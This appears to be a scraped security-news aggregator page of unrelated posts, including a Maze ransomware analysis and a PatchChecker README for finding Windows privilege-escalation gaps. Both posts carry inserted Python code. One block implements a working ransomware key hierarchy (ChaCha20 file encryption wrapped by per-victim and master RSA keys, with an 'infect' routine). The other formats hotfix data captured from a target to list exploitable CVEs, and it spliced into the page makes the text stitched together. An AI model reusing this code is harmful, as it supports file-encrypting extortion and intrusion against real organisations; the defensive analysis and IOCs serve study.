Companies have to move to this kind of radical process change to advance what they are doing and meet the incredibly demanding cycle times required by the business. There is an acceleration of business needs that, in turn, requires an acceleration in the delivery of innovation to meet those needs.

To move from cycle times that were at best once a quarter, to once a day, or even at every pull request, it’s critical to run tests through the pipeline in parallel. Delphix automates data delivery for immediate access and provides test teams running in parallel with the exact dataset.

You mentioned that you help clients improve not only processes and technologies, but also people and culture. How do you go about doing that?

We also administer a value stream review to understand where the blockages are across the lifecycle and pipeline. We look at the technology and tools needed to improve the process, but we also look at the organization and the people as key elements to building the connective tissue needed for long-term success.

For example, people will often focus on a tool that they think will solve all their problems. The tool may add value, but the people may not be trained properly, or culturally they may not be ready to evolve roles and responsibilities. Traditionally, silos were built to keep people separate and focused, and it’s hard to break those down to foster a new era of collaboration. If people aren’t ready for change, aren’t communicating well, and don’t yet understand how the changes will help them do their work better, then they often become roadblocks and sabotage success.

When we introduce new technology, we work with the client to understand who the stakeholders are to build a comprehensive training plan and build out an implementation roadmap that involves everyone. Transformation means roles and responsibilities might change in the new equation. 

We will conduct a POC to see how the technology works but in the end, the technology itself has finite combinations of challenges that can be methodically identified and addressed. People and culture will present an infinite number of challenges. So a key element of the POC is to see how people should be aligned, what processes need to change, and what roadblocks need to be cleared. Customers need to do this before they scale.  

We live agile ourselves. Delivering on a transformation strategy is all agile in nature. A methodical approach keeps us aligned with the client. We do daily scrums and work in two-week sprints, so they can monitor progress and feel confident in the execution.

The post Delphix Partner Spotlight on Orasi appeared first on Security Boulevard.

https://malwaredevil.com/2020/10/21/delphix-partner-spotlight-on-orasi/?utm_source=rss&utm_medium=rss&utm_campaign=delphix-partner-spotlight-on-orasi

Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks

The Feds have published a Top 25 exploits list, rife with big names like BlueKeep, Zerologon and other notorious security vulnerabilities.

https://malwaredevil.com/2020/10/21/bug-parade-nsa-warns-on-cresting-china-backed-cyberattacks/?utm_source=rss&utm_medium=rss&utm_campaign=bug-parade-nsa-warns-on-cresting-china-backed-cyberattacks

As Smartphones Become a Hot Target, Can Mobile EDR Help?

Lookout Security debuts a mobile endpoint detection and response offering that will integrate into its mobile security platform.

https://malwaredevil.com/2020/10/21/as-smartphones-become-a-hot-target-can-mobile-edr-help/?utm_source=rss&utm_medium=rss&utm_campaign=as-smartphones-become-a-hot-target-can-mobile-edr-help

ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards

BOULDER, Colo.—October 21, 2020—ManagedMethods, the leading Google Workspace and Microsoft 365 cybersecurity, student safety and compliance platform for K-12 school districts, today announced the company has been named the Gold winner in the “Education Cloud-Based Solution” category in the 2020 Golden Bridge Business and Innovation Awards. ManagedMethods has also been named a Silver winner in […]

The post ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards appeared first on ManagedMethods.

The post ManagedMethods Recognized as the “Education Cloud-Based Solution” Gold Winner in the 2020 Golden Bridge Awards appeared first on Security Boulevard.

https://malwaredevil.com/2020/10/21/managedmethods-recognized-as-the-education-cloud-based-solution-gold-winner-in-the-2020-golden-bridge-awards/?utm_source=rss&utm_medium=rss&utm_campaign=managedmethods-recognized-as-the-education-cloud-based-solution-gold-winner-in-the-2020-golden-bridge-awards

Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row

We’re thrilled to announce that Gartner has named Signal Sciences a Visionary in the 2020 Magic Quadrant for Web Application Firewalls (WAF) for the second year running. Last year was our first entrance in the 2019 Gartner Magic Quadrant for…

The post Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row appeared first on Signal Sciences.

The post Signal Sciences Recognized as a Visionary in Gartner Magic Quadrant for Web Application Firewalls Two Years in a Row appeared first on Security Boulevard.

https://malwaredevil.com/2020/10/21/signal-sciences-recognized-as-a-visionary-in-gartner-magic-quadrant-for-web-application-firewalls-two-years-in-a-row/?utm_source=rss&utm_medium=rss&utm_campaign=signal-sciences-recognized-as-a-visionary-in-gartner-magic-quadrant-for-web-application-firewalls-two-years-in-a-row

20 new Cisco security advisories for ASA and Firepower with CVSS>7: https://tools.cisco.com/security/center/publicationListing.x, (Wed, Oct 21st)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

https://malwaredevil.com/2020/10/21/20-new-cisco-security-advisories-for-asa-and-firepower-with-cvss7-https-tools-cisco-com-security-center-publicationlisting-x-wed-oct-21st/?utm_source=rss&utm_medium=rss&utm_campaign=20-new-cisco-security-advisories-for-asa-and-firepower-with-cvss7-https-tools-cisco-com-security-center-publicationlisting-x-wed-oct-21st

Security Alert: Oracle Releases Critical Patch Update, October 2020

https://malwaredevil.com/2020/10/21/security-alert-oracle-releases-critical-patch-update-october-2020-2/?utm_source=rss&utm_medium=rss&utm_campaign=security-alert-oracle-releases-critical-patch-update-october-2020-2

Multi Factor Authentication for Remote Desktop Gateway and RDP Connections

Some or even your entire workforce might now be dispersed but their access to company networks still needs to be protected. Here we look at why a second factor of authentication is recommended to protect remote access. RDP Connections The Microsoft Remote Desktop Protocol (also known as RDP) is used to allow remote desktop to … Continued

The post Multi Factor Authentication for Remote Desktop Gateway and RDP Connections appeared first on Enterprise Network Security Blog from IS Decisions.

The post Multi Factor Authentication for Remote Desktop Gateway and RDP Connections appeared first on Security Boulevard.

https://malwaredevil.com/2020/10/21/multi-factor-authentication-for-remote-desktop-gateway-and-rdp-connections/?utm_source=rss&utm_medium=rss&utm_campaign=multi-factor-authentication-for-remote-desktop-gateway-and-rdp-connections

Life of Maze ransomware

In the past year, Maze ransomware has become one of the most notorious malware families threatening businesses and large organizations. Dozens of organizations have fallen victim to this vile malware, including LG, Southwire, and the City of Pensacola.

The history of this ransomware began in the first half of 2019, and back then it didn’t have any distinct branding – the ransom note included the title “0010 System Failure 0010”, and it was referenced by researchers simply as ‘ChaCha ransomware’.

Ransom note of an early version of Maze/ChaCha ransomware

Shortly afterwards, new versions of this Trojan started calling themselves Maze and using a relevantly named website for the victims instead of the generic email address shown in the screenshot above.

Website used by a recent version of Maze ransomware

Infection scenarios

Mass campaigns

The distribution tactic of the Maze ransomware initially involved infections via exploit kits (namely, Fallout EK and Spelevo EK), as well as via spam with malicious attachments. Below is an example of one of these malicious spam messages containing an MS Word document with a macro that’s intended to download the Maze ransomware payload.

If the recipient opens the attached document, they will be prompted to enable editing mode and then enable the content. If they fall for it, the malicious macro contained inside the document will execute, which in turn will result in the victim’s PC being infected with Maze ransomware.

Tailored approach

In addition to these typical infection vectors, the threat actors behind Maze ransomware started targeting corporations and municipal organizations in order to maximize the amount of money extorted.

The initial compromise mechanism and subsequent tactics vary. Some incidents involved spear-phishing campaigns that installed Cobalt Strike RAT, while in other cases the network breach was the result of exploiting a vulnerable internet-facing service (e.g. Citrix ADC/Netscaler or Pulse Secure VPN). Weak RDP credentials on machines accessible from the internet also pose a threat as the operators of Maze may use this flaw as well.

Privilege escalation, reconnaissance and lateral movement tactics also tend to differ from case to case. During these stages, the use of the following tools has been observed: mimikatz, procdump, Cobalt Strike, Advanced IP Scanner, Bloodhound, PowerSploit, and others.

During these intermediate stages, the threat actors attempt to identify valuable data stored on the servers and workstations in the compromised network. They will then exfiltrate the victim’s confidential files in order to leverage them when negotiating the size of the ransom.

At the final stage of the intrusion, the malicious operators will install the Maze ransomware executable onto all the machines they can access. This results in the encryption of the victim’s valuable data and finalizes the attack.

Data leaks/doxing

Maze ransomware was one of the first ransomware families that threatened to leak the victims’ confidential data if they refused to cooperate.

In fact, this made Maze something of a trendsetter because this approach turned out to be so lucrative for the criminals that it’s now become standard for several notorious ransomware gangs, including REvil/Sodinokibi, DoppelPaymer, JSWorm/Nemty/Nefilim, RagnarLocker, and Snatch.

The authors of the Maze ransomware maintain a website where they list their recent victims and publish a partial or a full dump of the documents they have managed to exfiltrate following a network compromise.

Website with leaked data published by Maze operators

Ransomware cartel

In June 2020, the criminals behind Maze teamed up with two other threat actor groups, LockBit and RagnarLocker, essentially forming a ‘ransomware cartel’. The data stolen by these groups now gets published on the blog maintained by the Maze operators.

It wasn’t just the hosting of exfiltrated documents where the criminals pooled their efforts – apparently they are also sharing their expertise. Maze now uses execution techniques that were previously only used by RagnarLocker.

Brief technical overview

The Maze ransomware is typically distributed as a PE binary (EXE or DLL depending on the specific scenario) which is developed in C/C++ and obfuscated by a custom protector. It employs various tricks to hinder static analysis, including dynamic API function imports, control flow obfuscation using conditional jumps, replacing RET with JMP dword ptr [esp-4], replacing CALL with PUSH + JMP, and several other techniques.

To counter dynamic analysis, this Trojan will also terminate processes typically used by researchers, e.g. procmon, procexp, ida, x32dbg, etc.

The cryptographic scheme used by Maze consists of several levels:

  • To encrypt the content of the victim’s files, the Trojan securely generates unique keys and nonce values to use with the ChaCha stream cipher;
  • The ChaCha keys and nonce values are encrypted by a session public RSA-2048 key which is generated when the malware is launched;
  • The session private RSA-2048 key is encrypted by the master public RSA-2048 key hardcoded in the Trojan’s body.

This scheme is a variation of a more or less typical approach used by developers of modern ransomware. It allows the operators to keep their master private RSA key secret when selling decryptors for each individual victim, and it also ensures that a decryptor purchased by one victim won’t help others.
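The key hierarchy just described, as an added illustration rather than code from Kaspersky or from the Maze binary itself: a self-contained Python model of the three levels. ChaCha20 is implemented from the RFC 8439 description; the two RSA layers are textbook RSA built on hardcoded Mersenne primes with no padding, which is insecure and is used here only to keep the example dependency-free (a real implementation, and the real Trojan, generate random 2048-bit keys with a crypto library). The victim file names and contents are constructed sample data, and `infect`, `operator_release` and `victim_decrypt` are names chosen for this example, not routines from the malware.

```python
import os
import struct

M32 = 0xFFFFFFFF


def _qr(s, a, b, c, d):
    """ChaCha quarter round on state s (RFC 8439 section 2.1), in place."""
    s[a] = (s[a] + s[b]) & M32; s[d] ^= s[a]; s[d] = ((s[d] << 16) | (s[d] >> 16)) & M32
    s[c] = (s[c] + s[d]) & M32; s[b] ^= s[c]; s[b] = ((s[b] << 12) | (s[b] >> 20)) & M32
    s[a] = (s[a] + s[b]) & M32; s[d] ^= s[a]; s[d] = ((s[d] << 8) | (s[d] >> 24)) & M32
    s[c] = (s[c] + s[d]) & M32; s[b] ^= s[c]; s[b] = ((s[b] << 7) | (s[b] >> 25)) & M32


def chacha20_block(key, counter, nonce):
    """One 64-byte keystream block from a 32-byte key, block counter and 12-byte nonce."""
    state = (list(struct.unpack("<4I", b"expand 32-byte k"))
             + list(struct.unpack("<8I", key)) + [counter]
             + list(struct.unpack("<3I", nonce)))
    w = state[:]
    for _ in range(10):                      # 20 rounds: 10 x (column round + diagonal round)
        _qr(w, 0, 4, 8, 12); _qr(w, 1, 5, 9, 13); _qr(w, 2, 6, 10, 14); _qr(w, 3, 7, 11, 15)
        _qr(w, 0, 5, 10, 15); _qr(w, 1, 6, 11, 12); _qr(w, 2, 7, 8, 13); _qr(w, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & M32 for x, y in zip(w, state)])


def chacha20_xor(key, nonce, data):
    """Encrypt or decrypt (same operation): XOR data with the ChaCha20 keystream."""
    out = bytearray()
    for i in range(0, len(data), 64):
        out += bytes(x ^ y for x, y in zip(data[i:i + 64], chacha20_block(key, i // 64, nonce)))
    return bytes(out)


# Textbook RSA, demo only: fixed Mersenne primes stand in for random prime
# generation and there is no padding, so this must not be reused as-is.
E = 65537
MERSENNE = {k: (1 << k) - 1 for k in (521, 607, 1279, 2203, 2281)}


def rsa_keypair(p, q):
    n = p * q
    return (n, E), (n, pow(E, -1, (p - 1) * (q - 1)))   # (public, private); Python 3.8+


def rsa_apply(key, m):
    n, exp = key
    if not 0 <= m < n:
        raise ValueError("integer does not fit under this modulus")
    return pow(m, exp, n)


# Level 3 key: the public half is what would be hardcoded in the Trojan,
# the private half stays with the operators and never touches a victim machine.
MASTER_PUB, MASTER_PRIV = rsa_keypair(MERSENNE[2203], MERSENNE[2281])


def infect(files, master_pub, session_primes):
    """Trojan side, one victim.  session_primes picks this victim's (demo) session key."""
    sess_pub, sess_priv = rsa_keypair(MERSENNE[session_primes[0]], MERSENNE[session_primes[1]])
    encrypted = {}
    for name, plaintext in files.items():
        key, nonce = os.urandom(32), os.urandom(12)                        # level 1: fresh per file
        wrapped = rsa_apply(sess_pub, int.from_bytes(key + nonce, "big"))  # level 2: session pubkey
        encrypted[name] = (wrapped, chacha20_xor(key, nonce, plaintext))
    return {"n_session": sess_pub[0],
            "wrapped_session_priv": rsa_apply(master_pub, sess_priv[1]),  # level 3: master pubkey
            "files": encrypted}


def operator_release(blob, master_priv):
    """Operator side after payment: unwrap one victim's session private key.
    Only this per-victim key is handed over; master_priv never leaves."""
    return (blob["n_session"], rsa_apply(master_priv, blob["wrapped_session_priv"]))


def victim_decrypt(blob, session_priv):
    """Decryptor sold to one victim: unwrap each file key, then undo ChaCha20.
    A file that cannot be unwrapped with this key maps to None."""
    recovered = {}
    for name, (wrapped, ciphertext) in blob["files"].items():
        try:
            kn = rsa_apply(session_priv, wrapped)
        except ValueError:
            recovered[name] = None
            continue
        if kn >= 1 << (44 * 8):              # wrong session key: the unwrap yields garbage
            recovered[name] = None
            continue
        kn = kn.to_bytes(44, "big")
        recovered[name] = chacha20_xor(kn[:32], kn[32:], ciphertext)
    return recovered


def demo():
    """Two victims under one master key; victim B's purchased decryptor cannot open A's files.
    File names and contents are constructed sample data."""
    blob_a = infect({"ledger.xlsx": b"victim A payroll " * 20}, MASTER_PUB, (521, 607))
    blob_b = infect({"plans.docx": b"victim B blueprints " * 20}, MASTER_PUB, (607, 1279))
    priv_a = operator_release(blob_a, MASTER_PRIV)
    priv_b = operator_release(blob_b, MASTER_PRIV)
    return {"a_with_a": victim_decrypt(blob_a, priv_a),
            "b_with_b": victim_decrypt(blob_b, priv_b),
            "a_with_b": victim_decrypt(blob_a, priv_b)}


if __name__ == "__main__":
    for case, result in demo().items():
        print(case, {k: (v[:16] if v else v) for k, v in result.items()})
```

Running `demo()` shows the property the paragraph above states: the operators can release victim A's session key with the master private key, that key opens A's files, and the same decryptor returns `None` for every file when pointed at victim B's data, so a purchased decryptor is useless to other victims. The whole scheme rests on the master private key never being present on the infected machine; only its public half is hardcoded, which is why recovering files from the binary alone is not possible.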

When executing on a machine, Maze ransomware will also attempt to determine what kind of PC it has infected. It tries to distinguish between different types of system (‘backup server’, ‘domain controller’, ‘standalone server’, etc.). Using this information in the ransom note, the Trojan aims to further scare the victims into thinking that the criminals know everything about the affected network.

Strings that Maze uses to generate the ransom note

Fragment of the procedure that generates the ransom note

How to avoid and prevent

Ransomware evolves day by day, so a purely reactive approach to infection is not effective. The best defense against ransomware is proactive prevention, because once data has been encrypted it is often too late to recover it.

There are a number of recommendations that may help prevent attacks like these:

  1. Keep your OS and applications patched and up to date.
  2. Train all employees on cybersecurity best practices.
  3. Only use secure, authenticated technology for remote connections into the corporate network.
  4. Use endpoint security with behavior detection and automatic file rollback, such as Kaspersky Endpoint Security for Business.
  5. Use the latest threat intelligence information to detect an attack quickly, understand what countermeasures are useful, and prevent it from spreading.

Detection

Kaspersky products protect against this ransomware, detecting it as Trojan-Ransom.Win32.Maze; it is blocked by Behavior-based Protection as PDM:Trojan.Win32.Generic.

We safeguard our customers with the best Ransomware Protection technologies.

TIP Cloud Sandbox report summary and execution map with mapping on MITRE ATT&CK Framework

IOCs

2332f770b014f21bcc63c7bee50d543a
CE3A5898E2B2933FD5216B27FCEACAD0
54C9A5FC6149007E9B727FCCCDAFBBD4
8AFC9F287EF0F3495B259E497B30F39E

https://malwaredevil.com/2020/10/21/life-of-maze-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=life-of-maze-ransomware

PatchChecker – Web-based check for Windows privesc vulnerabilities

This is the code base for the service running on: https://patchchecker.com. In short, PatchChecker is a web application (running on flask) that provides output similar to that of Watson. However, by using PatchChecker, one is not required to execute a binary on the target machine. Included in this project is also a web scraper that automatically updates the PatchChecker database from information present on Microsoft sites; this makes finding the CVEs a Windows system is (or is not) patched against more scalable and easier. Additionally, any other CVEs can be added to the data collector input and checked for, as long as they have an entry on https://portal.msrc.microsoft.com. You can also use this to get the data to update Watson.

Further information about this project can be found here or here (github.io mirror).

Using PatchChecker to check vulnerabilities:

To use the patchchecker, you can either go to the publicly hosted website here at patchchecker.com or you can git clone this repo, install the required libraries, make sure patches.db is in the same directory as app.py, and then start the application with python3 ./app.py. Once the application is started you can open the included “index.html” file in a browser to actually use the service and get the list of patches to which the system being tested is vulnerable.
Additional information can be found here.

Getting KB data:

Expected input:

Expected output from webpage:

Expected output from webpage when vulnerabilities are found:

Alternatively, you can use a curl command and do something like this: Request:
note: you can use any delimiter you wish, I’m using spaces here:

curl 'https://patchchecker.com/checkprivs/' --data-raw 'wmicinfo=KB1231411 KB1231441 KB1234141&build_num=17763'

Response:
note: used some fake KBs so it’s showing vuln to everything, i.e. I have nothing installed
note: output is truncated

{
    "total_vuln": 9,
    "kbs_parsed": [
        "KB1231411",
        "KB1231441",
        "KB1234141"
    ],
    "total_kbs_parsed": 3,
    "build": "17763",
    "results": [
        {
            "refs": [
                "https://exploit-db.com/exploits/46718",
                "https://decoder.cloud/2019/04/29/combinig-luafv-postluafvpostreadwrite-race-condition-pe-with-diaghub-collector-exploit-from-standard-user-to-system/"
            ],
            "name": "CVE-2019-0836",
            "vulnerable": true
        }
    ]
}

To run the code in this repo yourself don’t forget to run: python3 -m pip install -r requirements.txt and run with python3. For reference, I used python 3.7.3.

Data Collection: patchdata_collector.py

The patchdata_collector.py script is the pyppeteer scraper that iterates through several Microsoft sites to get the desired data for the CVEs specified in the --cve-list arg file. For an example of the expected format see the cves.txt file within the samples directory. Basically it’s a line-separated file with each line containing the following: CVE-XXXX-XXXX|https://website.com/resource-pertaining-to-CVE,http://second_resource.com, you get the idea. An example of the resulting output can be found in the patches.db file included.
The code isn’t perfect but it gets the data and works for the time being. As reference, with 9 CVEs, it should take about 11 minutes to complete, YMMV.
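A client-side helper for the request and response shown earlier and for the --cve-list format described just above, added here as an example and not part of the PatchChecker repository: it extracts the KB identifiers from raw hotfix output, form-encodes them exactly as the curl line does, picks the vulnerable entries out of the JSON reply, and parses a --cve-list file. The hotfix output is assumed to come from `wmic qfe get HotFixID` (the page names the field `wmicinfo` but does not say how it is gathered); the sample output, sample response and sample CVE list are constructed for this example, and only `check_online` talks to the real service, which the offline samples do not need.

```python
import json
import re
import urllib.request
from urllib.parse import urlencode

# Constructed sample, assumed to be what `wmic qfe get HotFixID` prints on the
# target (the page calls the field "wmicinfo" but does not say how it is gathered).
SAMPLE_WMIC_OUTPUT = """HotFixID
KB4465065
KB4470788
KB4486553
KB4470788
KB4512578
"""

# Constructed sample response with the same shape as the truncated one on the page.
SAMPLE_RESPONSE = json.dumps({
    "total_vuln": 2,
    "kbs_parsed": ["KB4465065", "KB4470788", "KB4486553", "KB4512578"],
    "total_kbs_parsed": 4,
    "build": "17763",
    "results": [
        {"name": "CVE-2019-0836", "vulnerable": True,
         "refs": ["https://exploit-db.com/exploits/46718"]},
        {"name": "CVE-2019-1064", "vulnerable": False, "refs": []},
        {"name": "CVE-2020-1048", "vulnerable": True,
         "refs": ["https://github.com/ionescu007/PrintDemon"]},
    ],
})

# Constructed sample in the --cve-list format (URLs are the ones the page itself shows).
SAMPLE_CVE_LIST = """CVE-2019-0836|https://exploit-db.com/exploits/46718
CVE-2020-1048|https://github.com/ionescu007/faxhell,https://github.com/ionescu007/PrintDemon
"""

KB_RE = re.compile(r"\bKB\d{6,7}\b")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def extract_kbs(wmic_text):
    """All KB identifiers in raw wmic output, deduplicated, first-seen order kept."""
    seen = []
    for kb in KB_RE.findall(wmic_text):
        if kb not in seen:
            seen.append(kb)
    return seen


def build_request_body(wmic_text, build_num):
    """Form-encode the two fields /checkprivs/ reads; the KBs are space-delimited
    as in the curl example (urlencode turns the spaces into '+')."""
    return urlencode({"wmicinfo": " ".join(extract_kbs(wmic_text)),
                      "build_num": str(build_num)})


def vulnerable_cves(response_text):
    """(cve, refs) for every result flagged vulnerable, sorted by CVE id."""
    data = json.loads(response_text)
    return sorted((r["name"], r["refs"]) for r in data["results"] if r.get("vulnerable"))


def parse_cve_list(text):
    """Parse the line- and pipe-separated --cve-list file into {cve: [urls]}."""
    out = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        cve, sep, urls = line.partition("|")
        if not sep or not CVE_RE.fullmatch(cve):
            raise ValueError(f"line {lineno}: expected 'CVE-YYYY-NNNN|url[,url...]'")
        out[cve] = [u for u in urls.split(",") if u]
    return out


def check_online(wmic_text, build_num, url="https://patchchecker.com/checkprivs/"):
    """POST the same body the curl line sends and return the parsed hits.
    Needs network access; the offline samples above do not use it."""
    body = build_request_body(wmic_text, build_num).encode()
    with urllib.request.urlopen(urllib.request.Request(url, data=body), timeout=30) as resp:
        return vulnerable_cves(resp.read().decode())


if __name__ == "__main__":
    print(build_request_body(SAMPLE_WMIC_OUTPUT, 17763))
    for cve, refs in vulnerable_cves(SAMPLE_RESPONSE):
        print(cve, *refs)
    print(parse_cve_list(SAMPLE_CVE_LIST))
```

On a real engagement the input to `build_request_body` is the hotfix listing captured from the target (any delimiter works, as the README notes) together with the OS build number, and the return value of `vulnerable_cves` is the list worth triaging, each entry carrying the references the database stores for that CVE.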

patchdata_collector.py usage:

usage: patchdata_collector.py [-h] --cve-list CVE_LIST [--db DB] [--new-db] [-v]
                          [-vv] [--no-headless] [--json JSON]

optional arguments:
  -h, --help           show this help message and exit
  --cve-list CVE_LIST  line and pipe separated list containing CVEs and
                       related-URLs with information example: CVE-2020-1048|https://github.com/ionescu007/faxhell,https://github.com/ionescu007/PrintDemon
  --db DB              sqlite database filename
  --new-db             erases old database (if exists)
  -v                   set output to debug (verbose)
  -vv                  set output to annoying
  --no-headless        run browser with headless mode disabled
  --json JSON          json format output, argument should be json filename

Example run:

Running time ./patchdata_collector.py --cve-list cves.txt --db antest.db --new-db yields the following output:

2020-06-05 20:38:49.292 | INFO     | __main__:main:181 - Loaded 10 CVEs
2020-06-05 20:38:49.430 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-0836
2020-06-05 20:40:27.183 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1064
2020-06-05 20:41:07.158 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-0841
2020-06-05 20:41:31.675 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1130
2020-06-05 20:42:58.527 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1253
2020-06-05 20:43:25.069 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1315
2020-06-05 20:44:57.974 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1385
2020-06-05 20:45:22.026 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1388
2020-06-05 20:46:48.407 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2019-1405
2020-06-05 20:48:07.026 | INFO     | __main__:parsekb:33 - Parsing KBs for: CVE-2020-1048
finished

real    11m27.793s
user    1m21.632s
sys     0m14.559s

The post PatchChecker – Web-based check for Windows privesc vulnerabilities appeared first on Hakin9 – IT Security Magazine.

The post PatchChecker – Web-based check for Windows privesc vulnerabilities appeared first on Malware Devil.



https://malwaredevil.com/2020/10/21/patchchecker-web-based-check-for-windows-privesc-vulnerabilities/?utm_source=rss&utm_medium=rss&utm_campaign=patchchecker-web-based-check-for-windows-privesc-vulnerabilities

VMware ESXi OpenSLP – Remote Code Execution Vulnerability (CERT-EU Security Advisory 2020-051)

On the 20th of October 2020, VMware released a security advisory for a vulnerability affecting ESXi OpenSLP, identified as CVE-2020-3992. OpenSLP as used in VMware ESXi has a use-after-free issue. VMware has evaluated the severity of this issue to be in the critical severity range, with a maximum CVSSv3 base score of 9.8 out of 10.


https://malwaredevil.com/2020/10/21/vmware-esxi-openslp-remote-code-execution-vulnerability-cert-eu-security-advisory-2020-051/?utm_source=rss&utm_medium=rss&utm_campaign=vmware-esxi-openslp-remote-code-execution-vulnerability-cert-eu-security-advisory-2020-051

More Effective Security Awareness: 3 Tips for NCSAM

It’s often said that humans are the weakest link in cybersecurity. Indeed, I’d have a hard time arguing that a computer that was sealed in a box, untouched by human hand, poses much of a security risk. But a computer that is unused has no purpose. It behooves security practitioners to get smarter about how […]

The post More Effective Security Awareness: 3 Tips for NCSAM appeared first on The State of Security.

The post More Effective Security Awareness: 3 Tips for NCSAM appeared first on Security Boulevard.



https://malwaredevil.com/2020/10/21/more-effective-security-awareness-3-tips-for-ncsam/?utm_source=rss&utm_medium=rss&utm_campaign=more-effective-security-awareness-3-tips-for-ncsam

How To Tackle the 5 Biggest Enterprise IoT Security Challenges

The proliferation of IoT devices, particularly in the workplace, has left businesses with a new set of security challenges to deal with. For any company considering investing in IoT devices, it is important to understand the nature of these challenges and how to address them. One of the biggest challenges to enterprise IoT adoption is..

The post How To Tackle the 5 Biggest Enterprise IoT Security Challenges appeared first on Security Boulevard.



https://malwaredevil.com/2020/10/21/how-to-tackle-the-5-biggest-enterprise-iot-security-challenges/?utm_source=rss&utm_medium=rss&utm_campaign=how-to-tackle-the-5-biggest-enterprise-iot-security-challenges

Is Telco Cybersecurity the New Competitive Edge for Service Providers?

In my 20+ years working for and with telecommunication providers around the world, I’ve witnessed firsthand how the industry has evolved to offer continuously improved services to a wide audience of consumers. One of the most amazing things about this industry is that it provides essential connectivity service to every segment of society – from…

The post Is Telco Cybersecurity the New Competitive Edge for Service Providers? appeared first on Allot Blog.

The post Is Telco Cybersecurity the New Competitive Edge for Service Providers? appeared first on Security Boulevard.



https://malwaredevil.com/2020/10/21/is-telco-cybersecurity-the-new-competitive-edge-for-service-providers/?utm_source=rss&utm_medium=rss&utm_campaign=is-telco-cybersecurity-the-new-competitive-edge-for-service-providers

HPSCI Takes Misinformation, Conspiracy Theories Hearing Online

The House Permanent Select Committee on Intelligence held a virtual hearing on the topic of Misinformation and Conspiracy Theories with an august panel of specialists well-steeped in how disinformation and misinformation are created, amplified and consumed. The hearing underscored misinformation and conspiracy as both domestic and international issues with respect to the United States. The..

The post HPSCI Takes Misinformation, Conspiracy Theories Hearing Online appeared first on Security Boulevard.



https://malwaredevil.com/2020/10/21/hpsci-takes-misinformation-conspiracy-theories-hearing-online/?utm_source=rss&utm_medium=rss&utm_campaign=hpsci-takes-misinformation-conspiracy-theories-hearing-online

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...